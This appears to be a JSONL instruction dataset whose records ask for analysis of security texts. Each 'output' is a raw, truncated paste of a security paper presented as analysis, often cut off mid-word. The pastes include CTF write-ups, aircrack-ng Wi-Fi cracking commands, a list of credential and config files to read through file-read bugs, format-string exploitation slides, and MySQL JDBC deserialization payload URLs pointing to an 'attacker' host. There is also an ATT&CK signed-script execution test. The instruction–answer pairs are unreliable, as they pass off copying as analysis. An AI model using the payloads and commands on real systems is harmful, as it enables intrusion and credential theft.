asynchronous unidirectional or bi-directional connectivity with external world.  Develop a tool to shuttle communication over WebHooks. Set The Stage: Players  Offense (RED)  Defense(BLUE)  Content Proxy  Command and Control Server (C2)  C2 Broker  Internal Agent, Client  External Agen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Tupper needs help Misc., 5 points ## Description > I forgot the size of my kipod, can you help? k = 1149088036118748153043577013820072408885949020563817247643416097427609454784316480438935765354843225548041192362989341741100573490073448156985503983059433007456621869088528541601531021805434641158022863321604365912330878796519179999743007778309707144803824547692249224938557620335782675957793640790464297377099274055139536447837590517931851109546855273584874094409665031001792923933599279402800139404046854000506331325067964897620998752717795071450855954081334797627968452316244584618935641960635983970619395200199775096694978239798720856064 ## Solution Searching for \"Tupper\" in the context of CTFs, we arrive to [Tupper's Self-Referential Formula](https://en.wikipedia.org/wiki/Tupper's_self-referential_formula): > Tupper's self-referential formula is a formula that visually represents itself when graphed at a specific location in the (x, y) plane. [This online tool](http://keelyhill.github.io/tuppers-formula/) allows users to view a visual representation, given the value of `k`. The result for the provided `k` is: ![](images/tupper.png) The flag: `KAF{MY_KIPOD_IS_HUGE}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPinworm Man in the middle for metadata @bigezy_(bigezy) @itsasstime (saci) [need to add Introduction section] My previous related  Badger: Blackhat 2014 https://www.blackhat.com/docs/us- 14/materials/us-14-Rogers-Badger-The- Networked-Security-State-Estimation- Toolkit.pdf  Kobra: BsidesLV 2015 https://youtu.be/gOMVOv6VX50 Previous work from other people  IRPtracker https://www.osronline.com/article.cfm?articl e=199  IRPmon https://github.com/MartinDrab/IRPMon Data observations  Inside packets 998,802,444  Outside packets 1,371,775,557  Observed Destinations Firewalled Side 29,829  29,525 resolved via reverse lookup [2016 Observations]  Destinations per https connection up 400 percent for certain media sites  SSL data is streaming out even when the pc is idle.  More details to be added here later Is it 1984?  Mouse Movements  List of sites that track mouse movements from data (will be released at talk)  Key Strokes?  Microphone?  Video? A bit bloated IRP  Previous projects such as IRPtracker (link in attachment) proved interesting, but, sadly this program is limited to 32 bits.  But how to track 64 bit IRB process calls  Luckily there was a great start into this forensic research using an IRP sniffer based on work done by Martin Drab IRPmon IRPmon downfalls  IRPmon was a good start and showed the gaps needed to provide for man in the middle  More precision and information was needed regarding the data flows within the operating system  Device calls needed an in memory datastore so it would be possible to virtualize flows and pinpoint any duplication of input devices within the OS IRP Sniffing  Instrumentation of process access to devices  Devices provide I/O services that can be used by processes to harvest information  Keyboard  Mouse  Microphone  Video Mouse movement  What processes are interested in the mouse movements in your browser?  What network traffic is then generated as a result of these calls?  Use multiple data sources to get access to those things:  1 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe BYOD PEAP Show Mobile Devices Bare Auth Josh Yavor iSEC Partners DEF CON XXI August , Josh Yavor (iSEC Partners) The BYOD PEAP Show DEF CON XXI, August , / Introduction Welcome A Perfect Storm 1 1noaa.gov Josh Yavor (iSEC Partners) The BYOD PEAP Show DEF CON XXI, August , / Introduction Welcome PEAP: Pwned Extensible Authentication Protocol Joshua Wright & Brad Antoniewicz - ShmooCon Its amazing to me that lots of people seemed to have missed thisissueinPEAPandotherEAPmethods, asitsstillextremely useful in most of the pen-tests I engage in.  Joshua Wright, May 1 Windows and OS X FreeRADIUS-WPE PEAP and TTLS can be secure when deployed carefully 1http://www.willhackforsushi.com/?page_id=37 Josh Yavor (iSEC Partners) The BYOD PEAP Show DEF CON XXI, August , / Introduction Welcome Bring Your Own Device All the cool kids are doing it Growth %-% of companies Bring Your Own Definition EAP Types Josh Yavor (iSEC Partners) The BYOD PEAP Show DEF CON XXI, August , / Introduction Welcome CloudCracker Moxie Marlinspike, David Hulton, Marsh Ray - DEF CON XX Enterprises who are depending on the mutual authentication properties of MS-CHAPv for connection to their WPA Radius serversshouldimmediatelystartmigratingtosomethingelse.  Moxie Marlinspike, July , 2 Divide and conquer = % in hours 2https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/ Josh Yavor (iSEC Partners) The BYOD PEAP Show DEF CON XXI, August , / Introduction Welcome Take Aways Spoiler Alert Real-world deployments are messy PEAP is unsafe for BYOD environments Impact is enormous Immediate corrective action required No easy fix Users are in control Josh Yavor (iSEC Partners) The BYOD PEAP Show DEF CON XXI, August , / Introduction Welcome Bottom Line Defense Josh Yavor (iSEC Partners) The BYOD PEAP Show DEF CON XXI, August , / Introduction Welcome Bottom Line Offense Josh Yavor (iSEC Partners) The BYOD PEAP Show DEF CON XXI, August , / Introduction Welcome Some Disagree In a properly implemented wireless ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCookie之困 zootrope 清华大学网络与信息安全实验室NISL 走 马 Cookies Lack Integrity: Real-World Implications Xiaofeng Zheng, Jian Jiang, Jinjin Liang, Haixin Duan, Shuo Chen, Tao Wan and Nicholas Weaver USENIX Security '15 https://www.usenix.org/conference/usenixsecurity15/technical-sessions/presentation/zheng 谁忽视了Cookie安全 星巴克 离开星巴克时需要做什么 Cookie基础  用于保持HTTP会话状态/缓存信息  由服务器/脚本写入 Server: Set-Cookie: user=bob; domain=.bank.com; path=/; JS: document.cookie=user=bob; domain=.bank.com; path=/;;  存储于浏览器/传输于HTTP头部 Cookie: user=bob; cart=books; JS: console.log(document.cookie); à user=bob; cart=books;  三元组 [name, domain, path]唯一确定Cookie 写时带属性读时无属性 name, domain, path任一不同则Cookie不同 Set-Cookie: session=secret; domain=.bank.com; path=/; HTTP Cookie: session=secret; http://bank.com 泄露HTTP ② ③ Login ① Cookie: session=secret; ④ X HTTPS https://bank.com Set-Cookie: session=secret; domain=.bank.com; path=/; Cookie: session=secret; HTTPS Cookie基础同源策略(SOP) l Web SOP: [protocol, domain, port] http://www.bank.com http://www.bank.com:8080 https://www.bank.com l Cookie SOP: [domain, path]  仅以domain/path作为同源限制  不区分端口  不区分HTTP / HTTPS 非同源受SOP隔离保护 Cookie: session=secret; domain=.bank.com; path=/; http://bank.com https://bank.com Cookie基础Domain向上通配 l 在对Cookie读写时以通配的方式判断Domain是否有效 Set-Cookie: user1=aaa; domain=.bank.com; path=/; Set-Cookie: user2=bbb; domain=www.bank.com; path=/; Set-Cookie: user3=ccc; domain=.www.bank.com; path=/; Set-Cookie: user4=ddd; domain=other.bank.com; path=/; 写入 当页面为 http://www.bank.com 时 读取 访问 http://www.bank.com Cookie: user1=aaa; user2=bbb; user3=ccc; 接受 接受 接受 拒绝 Cookie: user1=aaa; 访问 http://user.bank.com Cookie基础Path向下通配 Set-Cookie: session=bob; domain=.bank.com; path=/; Set-Cookie: cart=books; domain=.bank.com; path=/buy/; http://bank.com/ Cookie: session=bob; http://bank.com/buy/ Cookie: session=bob; cart=books; 泄露Cookie in HTTPS https://bank.com HTTPS Set-Cookie: session=bob; domain=.bank.com; path=/; ① http://weibo.com <img src=http://non.bank.com /> Cookie: session=bob; ② http://no", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Aircrack <p align=\"center\"> <img src=\"../../../assets/img/logo/aircrack-ng.jpg\" width=\"25%\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **简介** aircrack 是一个比较出名的用于破解 WEP 和 WPA 加密的无线网络的一款工具由 6 个不同的部分组成 1. aircrack-ng 用于破解 WEP 以及 WPA-PSK 密钥一旦 aircrack-ng 工具收集了足够的信息aircrack-ng 将会分析这些数据并试图确定使用中的密钥 2. airdecap-ng 解读被破解的网络数据包 3. airmon-ng 为使用整个 aircrack-ng 套件配置一个网卡 4. aireplay-ng 在无线网络中产生可能在恢复中的 WEP 密钥所需的流量 5. airodump-ng 捕获被 aircrack-ng 用于破解 WEP 密钥的 802.11 帧 6. tools 为微调提供分类工具箱 **相关文章** - [记一次曲折的WIFI测试之路](https://www.secpulse.com/archives/96964.html) --- **配置无线网卡** - WM Ware(开机后) 虚拟机->可移动设备->Ralink 802.11 n Wlan(显卡型号)->连接(断开与主机的连接) - VBox 虚拟机关机状态下->将设备插入主机->设置->USB 设备->添加->删除除了供应商标识(VendorID)和产品标识(ProductID)之外的参数->开机->插入设备 - 验证是否连接成功 ```bash lsusb airmon-ng ifconfig iwconfig ``` 出现无线网卡型号即为成功 **无线基础命令** ```bash iwlist # 用于对 /proc/net/wireless 文件进行分析,得出无线网卡相关信息 iwlist wlan0 scanning | grep \"ESSID\" # 查看当前所有的 AP 名 iwconfig iwconfig wlan0 scanning # 扫描无线接入点 iwconfig wlan0 nickname hacking # 添加别名 ``` --- ## 例子 以无线网卡名为 wlan0 举例 ```bash airmon-ng start wlan0 # 启动网卡监听模式 airmon-ng check kill # 关闭干扰程序 airodump-ng wlan0mon # 开启抓包,获取附件无线网络 ``` | 列名 | 含义 |-------------------------------------------|------------------------- |BSSID(Basic Service SetIdentifier) |AP 的 MAC 地址 |PWR(Power) | 信号强度 |Beacons |AP 发出的通告编号, 每个接入点 (AP) 在最低速率 (1M) 时差不多每秒会发送 10 个左右的 beacon, 所以它们能在很远的地方就被发现 |Data | 当前数据传输量 |/s | 过去 10 秒钟内每秒捕获数据分组的数量 |CH(Channel) |AP 所在的频道 |MB |AP 的最大传输速度; MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g; 后面带. 的表示短封包标头, 处理速度快, 更利于破解 |ENC(Encryption) | 使用的加密算法体系 |CIPHER | 检测到的加密算法 |AUTH(Authority) | 认证方式 |ESSID(The Extended Service Set Identifier) |AP 的名称 ```bash airodump-ng -c 6 --bssid E0:24:81:AF:F3:A8 -w wireless wlan0mon # 指定特定的wifi抓握手包,出现 handshake 则抓包成功 # -c 指定信道,上面已经标记目标热点的信道(CH) # -bssid 指定目标路由器的BSSID,就是上面标记的BSSID # -w 指定抓取的数据包保存的目录 aircrack-ng -a2 -b E0:24:81:AF:F3:A8 -w pass.txt wireless-01.cap # 跑包 ``` **使用 hashcat 爆破(只能跑 WPA/WPA2/PSK 加密的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Relatively Secure Algorithm Category: Cryptography ## Description > The department of EEvil is plotting something, we found this file on one of the faculty's computers, can you figure out what it is? A text file was attached. ## Solution From the name of the challenge we can guess that it will deal with RSA. Let's check the attached file: ```console root@kali:/media/sf_CTFs/technion/Relatively_Secure_Algorithm# cat message.txt n: 825402695296235131092527557949148073680565936697713051415889293421029386404087786809133592938935623042440715527196520597292373820231062072474925946687326909527522368629975724388127799086004143533106667800998091247742389330432883797178326137254716519621196100994734775290514266572830378500333765897067796562788680689472323096811097130765013612651422495467212972214772718890261379968152205135925701904909039101189937253885371003736074519018221858648225347897987181571275839640491047203059389825550936971094398683210286052266410263866826268586236692135320079545001376164284247052679177411582273091659201220480533559746778789832073166797384358086283378353771172226575876935552196797307187999859754390947734663968491410635801184266690863992131425203127607174511857095265526424765821272294690124489772026301817212579031068294287661070265211790122376389183596252269054368365643460044953455035168757432011941774411665066875107329537717590084288937539003745260571770240109942546025847595253577165758019294931157968125588233441504909248216799233514466849049223331018386938363613854548693694755488670348728528933243830892350215180587991482856241757261724154872929793486588815163210598623606769681731012749290487884299695000130785666275868697293 e: 65537 p: 280693145851087560358485136475976108342257978008607528486634749701745833538861461995719795243519430715824320458062740293112334695997120674698517574893965248980655386253036852590516526170046558734855194835929352168687370770754975844595876582638066358217665906387765670439549998260871185416857041703923427978113823910737", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Fileread --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **相关文章** - [渗透测试-任意文件读取/下载漏洞](https://mp.weixin.qq.com/s/fpYKgybCQdSd5_AafNvt4w) **相关案例** - [京东商城两处任意目录遍历下载漏洞](http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2016-0214222) - [2 Path Traversal Cases](https://jlajara.gitlab.io/web/2020/03/29/Path_Traversal.html) - [电信某分站配置不当导致敏感文件泄露](http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-095088) - [一个任意文件读取漏洞记录](https://toutiao.io/posts/423535/app_preview) - [南方周末邮件服务器任意文件读取漏洞](http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2013-045426) - [一次文件读取漏洞的危害升级历程](https://www.freebuf.com/vuls/257629.html) - [任意文件读取拖源码](https://mp.weixin.qq.com/s/ipcg_abnzGMLySrfnKbR0Q) --- ## 利用思路 ### windows **常规配置文件** ``` C:\\windows\\win.ini //可以用来判断是否为windows系统 C:\\boot.ini //查看系统版本 C:\\Windows\\System32\\inetsrv\\MetaBase.xml //IIS 配置文件 C:\\Windows\\repair\\sam //存储系统初次安装的密码 C:\\Program Files\\mysql\\my.ini //Mysql 配置 C:\\Program Files\\mysql\\data\\mysql\\user.MYD //Mysql root C:\\Windows\\php.ini //php 配置信息 C:\\Windows\\my.ini //Mysql 配置信息 ``` **Windows Search索引文件(需要管理员权限)** 这个文件一般特别大,不是很推荐这种利用方法 ``` %ProgramData%\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb ``` **日志文件** %systemroot%\\System32\\winevt\\Logs 目录下 ``` Application.evtx ConnectionInfo.evtx Error.evtx HardwareEvents.evtx Internet Explorer.evtx Key Management Service.evtx Media Center.evtx Microsoft-Windows-API-Tracing%4Operational.evtx Microsoft-Windows-AppID%4Operational.evtx Microsoft-Windows-Application Server-Applications%4Admin.evtx Microsoft-Windows-Application Server-Applications%4Operational.evtx Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx Microsoft-Windows-Application-Experience%4Program-Inventory.evtx Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx ``` **命令行历史记录** ``` %userprofile%\\AppData\\Roamin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server Java Application Server Administration For Version 10.3 or Later Mac OS X Server Java Application Server Administration For Version 10.3 or Later January 22, 2004  Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Computer, Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apples copyright notice. The Apple logo is a trademark of Apple Computer, Inc. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. No licenses, express or implied, are granted with respect to any of the technology described in this book. Apple retains all intellectual property rights associated with the technology described in this book. This book is intended to assist application developers to develop applications only for Apple-labeled or Apple-licensed computers. Every effort has been made to ensure that the information in this document is accurate. Apple is not responsible for typographical errors. Apple Computer, Inc. 1 Infinite Loop Cupertino, CA 95014 408-996-1010 Apple, the Apple logo, Mac, and Mac OS are trademarks or Apple Computer, Inc., registered in the United States and other countries. Finder is a trademark or Apple Computer, Inc. Java and all Java-based trademarks are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries. Simultaneously published in the United States and Canada. Even though Apple has reviewed this manual, APPLE MAKES NO WARRANTY OR", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced Format String Attacks Presented by Paul Haas Contents  Background  Abstract  Definition  Context  Technique  How-to  Tools  Exploits  Conclusion  Q&A Background  Lead Web Application Security Engineer at Redspin, Inc with over 4 years experience in hundreds of audits.  This talk is not associated with my company  Defcon 13 CTF winner (Shellphish 2005)  Alumni of UCSBs Computer Security Group  Mario Kart DS: Rob in Tank on Rainbow Road In #include <stdio.h> int main(int argc, char **argv){ printf(argv[1]); } Out Reading arbitrary locations Writing arbitrary locations Executing arbitrary code Get a shell Without RTFM and Writing it yourself! Format String Attack  Software vulnerability in certain C functions that perform string formatting leading to the potential to write arbitrary data to arbitrary locations  Despite easy solutions, vulnerabilities and ignorance of issue still exist, hence the talk  Common in hackademic exercises  Talk assumes you have a basic idea of the attack (%x, %s, %n)  Talk details technique but tools do not require it Brief History  1990: csh Interaction Effect crash: !o%8f  1999-09-17: proftpd 1.2.0pre6 Argument attack/ snprintf Vulnerability (BID 650)  2000-06-22: wu-ftpd 2.6.0 Remote Format String Stack Overwrite Vulnerability (BID 1387)  2000-09-09: Format String Attacks whitepaper by Tim Newsham  2010-06-30: KVIrc DCC Directory Traversal and Multiple Format String Vulnerabilities (BID 40746) Old Technique  Manual popping up of stack using string of %xs  Get overwrite address using other technique  Search for shellcode in core after SEGFAULT  Characters written using long value in %x or %c  Final write to address using %n  Frequent RTFM  Write once, use once Current Technique  %p gives detailed information of stack location  %s allows us to view known stack addresses as strings  %NNc controls number of bytes written  %hhn allows single byte writes  Direct parameter access shortens format string: %5$n = %p%p%p%p%p%n New Technique ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMySQL-JDBC反序列化 漏洞原理 参考文章 eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack 小白看得懂的MySQL JDBC 反序列化漏洞分析 MySQL JDBC 客户端反序列化漏洞分析 MySQL JDBC反序列化漏洞 上面这个是BlackHat Europe 2019议题中的利用链在连接数据库的过程中可以触发漏洞连接 的条件 jdbc:mysql://attacker/db? queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor &autoDeserialize=true 需要设置这个 queryInterceptors 属性 ServerStatusDiffInterceptor 是一个拦截器在 JDBC URL 中设定属性 queryInterceptors 为 ServerStatusDiffInterceptor 时执行查询语句会调用拦截器的 preProcess 和 postProcess 方法进而通过上述调用链最终调用 getObject() 方法 payload payload 有两种触发方式 SHOW SESSION STATUS 和 SHOW COLLATION 然后不同的 mysql- connector-java 版本之间 payload 存在区别 ServerStatusDiffInterceptor触发 8.x jdbc:mysql://127.0.0.1:3306/mysql? serverTimezone=UTC&characterEncoding=utf8&useSSL=false&queryInterceptors=com.my sql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true\" 参 数名称 queryInterceptors 6.x jdbc:mysql://127.0.0.1:3306/mysql? serverTimezone=UTC&characterEncoding=utf8&useSSL=false&statementInterceptors=co m.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true\" 参数名称 statementInterceptors >=5.1.11 jdbc:mysql://127.0.0.1:3306/mysql? serverTimezone=UTC&characterEncoding=utf8&useSSL=false&statementInterceptors=co m.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true\" 参 数名称 statementInterceptors <=5.1.10 && >=5.1.0 网上的文章都说同上但是需要连接后执行查询但是我从连接流量当中并没有发现请求了 SHOW SESSION STATUS 语句但是发现他自动请求了 SHOW COLLATION 语句不过没有用到反序 列化 5.0.* 没有payload detectCustomCollations触发 >=5.1.41 无payload 5.1.29-5.1.40 jdbc:mysql://127.0.0.1:3306/test? detectCustomCollations=true&autoDeserialize=true 5.1.28-5.1.19 jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc <5.1.19 说是没有payload但是之前测试 5.1.2 版的时候请求了 SHOW COLLATION 语句好吧没有触 发反序列化所以确实没有 payload 漏洞复现 此处复现需要手动编写一个 mysql 服务端然后控制客户端连接客户端自动执行 SHOW SESSION STATUS 语句时返回我们的恶意 payload  jdbc 版本 5.1.39 先来看看一次连接所发送的请求数据包 package com; import java.sql.Connection; import java.sql.DriverManager; import java.sql.Pre", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSpartan 0day & Exploit exp-sky who am i  Tencents Xuanwu Lab  The security of browser  Vulnerability discovery  Exploit technique  APT attacks detection Spartan 0day & Exploit  1Isolation Heap  2Memory Protection  3Spartan Memory Manage  4CFG  5Exploit Bypass All  60day  7Q&A Isolation Heap //init heapHandle = HeapCreate(0, 0, 0); g_hIsolatedHeap = heapHandle; //use struct CElement* CButton::CreateElement(CHtmTag *a1, CDoc *a2) { void *mem = MemoryProtection::HeapAllocClear<1>(g_hIsolatedHeap, 0x5Cu); if ( Abandonment::CheckAllocationUntyped(mem) ) result = CButton::CButton(*((_DWORD *)a1 + 1), a2); else result = 0; return result; } Use Isolation Heap Alloc Memory Check Isolation Heap Isolated Heap Process Heap UAF Object Outer Object Use Spartan 0day & Exploit  1Isolation Heap  2Memory Protection  3Spartan Memory Manage  4CFG  5Exploit Bypass All  60day  7Q&A Memory Protection Memory Protection Heap UAF Object Not free Outer Object Not use Spartan 0day & Exploit  1Isolation Heap  2Memory Protection  3Spartan Memory Manage  4CFG  5Exploit Bypass All  60day  7Q&A Spartan Memory Manage  New Mode MemoryGC  init : chakra!MemProtectHeapCreate  alloc : chakra!MemProtectHeapRootAlloc  free : chakra!MemProtectHeapUnrootAndZero Spartan Memory Manage  New Mode //init MemoryProtection::InitializeProtectionFeature |-MemoryProtection_Mode = 3; |-MemoryProtection::CMemoryGC::InitializeFeature |-chakra!MemProtectHeapCreate Spartan Memory Manage  New Mode MemoryProtection::ReportHeapSize MemoryProtection::HeapAlloc<0> MemoryProtection::HeapAllocClear<0> MemoryProtection::HeapAlloc<1> MemoryProtection::HeapAllocClear<1> MemoryProtection::HeapReAlloc<1> MemoryProtection::HeapReAlloc<0> MemoryProtection::InitializeProtectionFeature Spartan Memory Manage  New Mode //alloc MemoryProtection::HeapAllocClear<1> |-MemoryProtection_Mode |- 0,1,2 : HeapAlloc Isolation |- 3 : chakra!MemProtectHeapRootAlloc |- Memory::Recycler Spartan Memory Manage  New Mode //free MemoryProtection::HeapFree |-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1990, 1991 Regents of the University of California. .\\\" All rights reserved. .\\\" .\\\" Redistribution and use in source and binary forms, with or without .\\\" modification, are permitted provided that the following conditions .\\\" are met: .\\\" 1. Redistributions of source code must retain the above copyright .\\\" notice, this list of conditions and the following disclaimer. .\\\" 2. Redistributions in binary form must reproduce the above copyright .\\\" notice, this list of conditions and the following disclaimer in the .\\\" documentation and/or other materials provided with the distribution. .\\\" 3. All advertising materials mentioning features or use of this software .\\\" must display the following acknowledgement: .\\\" This product includes software developed by the University of .\\\" California, Berkeley and its contributors. .\\\" 4. Neither the name of the University nor the names of its contributors .\\\" may be used to endorse or promote products derived from this software .\\\" without specific prior written permission. .\\\" .\\\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\\\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\\\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\\\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\\\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\\\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\\\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\\\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\\\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\\\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\\\" SUCH DAMAGE. .\\\" .\\\" @(#)stdio.3 6.5 (Berkeley) 5/6/91 .\\\" .\\\" Converted for Linux, Mon Nov 29 16:07:22 1993, faith@cs.unc.edu .\\\" Modified, 2001-12-26, aeb .\\\" .TH STDIO 3 2001-12-26", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Java date: 2021-03-10 19:50:01 background: bg-[#d33731] tags: - object-oriented - class categories: - Programming intro: | This cheat sheet is a crash course for Java beginners and help review the basic syntax of the Java language. plugins: - tooltip - copyCode --- Getting Started -------- ### Hello.java {.row-span-2} ```java public class Hello { // main method public static void main(String[] args) { // Output: Hello, world! System.out.println(\"Hello, world!\"); } } ``` Compiling and running ```shell script $ javac Hello.java $ java Hello Hello, world! ``` ### Variables ```java int num = 5; float floatNum = 5.99f; char letter = 'D'; boolean bool = true; String site = \"quickref.me\"; ``` ### Primitive Data Types {.row-span-2} | Data Type | Size | Default | Range | |-----------|--------|---------|---------------------| | `byte` | 1 byte | 0 | -128 to 127 | | `short` | 2 byte | 0 | -215 to 215-1 | | `int` | 4 byte | 0 | -231 to 231-1 | | `long` | 8 byte | 0 | -263 to 263-1 | | `float` | 4 byte | 0.0f | _N/A_ | | `double` | 8 byte | 0.0d | _N/A_ | | `char` | 2 byte | \\\\u0000 | 0 to 65535 | | `boolean` | _N/A_ | false | true / false | {.show-header} ### Strings ```java String first = \"John\"; String last = \"Doe\"; String name = first + \" \" + last; System.out.println(name); ``` See: [Strings](#java-strings) ### Loops ```java String word = \"QuickRef\"; for (char c: word.toCharArray()) { System.out.print(c + \"-\"); } // Outputs: Q-u-i-c-k-R-e-f- ``` See: [Loops](#java-loops) ### Arrays ```java char[] chars = new char[10]; chars[0] = 'a' chars[1] = 'b' String[] letters = {\"A\", \"B\", \"C\"}; int[] mylist = {100, 200}; boolean[] answers = {true, false}; ``` See: [Arrays](#java-arrays) ### Swap ```java int a = 1; int b = 2; System.out.println(a + \" \" + b); // 1 2 int temp = a; a = b; b = temp; System.out.println(a + \" \" + b); // 2 1 ``` ### Type Casting ```java // Widening // byte<short<int<long<float<double int i = 10; long l = i; // 10 // Narrowing double d = 10.02; long l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1216-win-签名脚本代理执行 ## 来自ATT&CK的描述 攻击者可能使用用可信证书签署的脚本来代理执行恶意文件在Windows安装中默认的几个微软签名脚本可以用来代理执行其他文件这种行为可能被攻击者滥用来执行恶意文件从而绕过系统的应用控制和签名验证 ## 测试案例 ### 测试1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 执行已签名的SyncAppvPublishingServer脚本并带有执行任意PowerShell命令的选项执行后calc.exe将被启动 攻击命令无需权限提升Windows命令行执行即可 ``` C:\\windows\\system32\\SyncAppvPublishingServer.vbs \"\\n;#{command_to_execute}\" ``` command_to_executeStart-Process calc ### 测试2 manage-bde.wsf Signed Script Command Execution manage-bde.wsf 签名脚本命令执行并带有执行任意命令的选项 ``` set comspec=#{command_to_execute} cscript %windir%\\System32\\manage-bde.wsf ``` command_to_execute%windir%\\System32\\calc.exe 清理命令 ``` set comspec=%windir%\\System32\\cmd.exe ``` ## 检测日志 Windows 安全日志Sysmon日志 ## 测试复现 ### 测试1 SyncAppvPublishingServer Signed Script PowerShell Command Execution ``` C:\\Users\\Administrator.ZHULI>C:\\windows\\system32\\SyncAppvPublishingServer.vbs \"\\n;Start-Process calc\" ``` ### 测试2 manage-bde.wsf Signed Script Command Execution ``` set comspec=%windir%\\System32\\calc.exe cscript %windir%\\System32\\manage-bde.wsf ``` 未复现成功缺少manage-bde.wsf文件下载了github上的文件但是提示异常 ``` C:\\Users\\Administrator.ZHULI>cscript %windir%\\System32\\manage-bde.wsf Microsoft (R) Windows Script Host Version 5.812 版权所有(C) Microsoft Corporation保留所有权利 C:\\Windows\\System32\\manage-bde.wsf(19, 38) Windows Script Host: 无效实体引用 ``` manage-bde.wsf文件参考地址<https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712> ## 测试留痕 ### 测试1 SyncAppvPublishingServer Signed Script PowerShell Command Execution ``` Process Create: RuleName: technique_id=T1059,technique_name=Command-Line Interface UtcTime: 2022-01-11 08:32:36.816 ProcessGuid: {78c84c47-40a4-61dd-5325-000000000800} ProcessId: 5680 Image: C:\\Windows\\System32\\wscript.exe FileVersion: 5.812.10240.16384 Description: Microsoft Product: Microsoft  Windows Script Host Company: Microsoft Corporation OriginalFileName: wscript.exe CommandLine: \"C:\\Windows\\System32\\WScript.exe\" \"C:\\windows\\system32\\SyncAppvPublishingServer.vbs\" \"\\n;St", "category": "text_analysis", "source": "security_papers"}
